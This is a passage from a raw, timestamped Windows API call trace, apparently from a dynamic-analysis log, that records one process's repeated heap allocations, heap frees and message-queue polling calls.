lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.122] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.122] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.123] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.123] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.123] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.124] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.124] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.124] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.155] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.155] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.155] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.156] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.156] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.156] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.157] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.157] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.157] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.158] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.158] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.158] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf2d8 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.159] 